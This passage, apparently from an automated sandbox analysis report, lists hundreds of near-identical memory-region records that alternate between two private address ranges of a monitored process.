monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7813 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7814 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7815 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7816 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7817 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7818 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7819 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7820 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7821 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7822 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7823 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7824 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7825 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7826 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7827 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7828 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7829 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7830 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7831 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7832 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7833 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7834 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7835 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7836 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7837 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7838 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7839 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7840 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7841 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7842 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7843 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7844 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7845 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7846 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7847 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7848 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7849 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7850 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7851 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7852 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7853 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7854 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7855 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7856 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7857 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7858 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7859 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7860 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7861 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7862 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7863 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7864 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7865 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7866 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7867 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7868 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7869 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7870 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7871 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7872 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7873 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7874 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7875 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7876 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7877 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7878 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7879 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7880 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7881 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7882 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7883 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7884 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7885 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7886 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7887 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7888 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7889 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7890 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7891 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7892 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7893 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7894 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7895 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7896 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7897 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7898 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7899 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7900 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7901 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7902 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7903 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7904 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7905 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7906 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7966 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7967 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7968 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7969 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7974 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7975 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7978 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7979 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7984 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7985 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7998 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7999 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8010 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8011 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8017 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8018 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8024 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8025 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8026 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8027 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8028 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8029 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8035 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8036 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8037 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8038 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8049 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8050 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8058 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8059 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8060 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8061 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8062 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8063 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8064 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8065 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8066 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8067 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8068 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8069 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8070 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8071 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8072 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8073 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8074 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8075 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8076 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8077 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8078 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8079 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8080 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8081 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8082 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8083 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8084 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8085 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8086 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8087 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8088 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8089 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8090 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8091 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8092 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8093 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8094 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8095 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8096 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8097 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8098 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8099 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8100 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8101 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8102 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8103 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8104 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8105 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8106 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8107 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8108 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8109 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8110 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8111 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8112 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8113 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8114 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8115 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8116 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8117 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8118 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8119 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8120 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8121 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8122 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8123 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8124 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8125 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8126 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8127 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8128 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8129 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8130 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8131 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8132 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8133 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8134 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8135 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8136 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8137 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8138 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8139 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8140 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8141 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8142 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8143 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8144 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8145 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8146 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 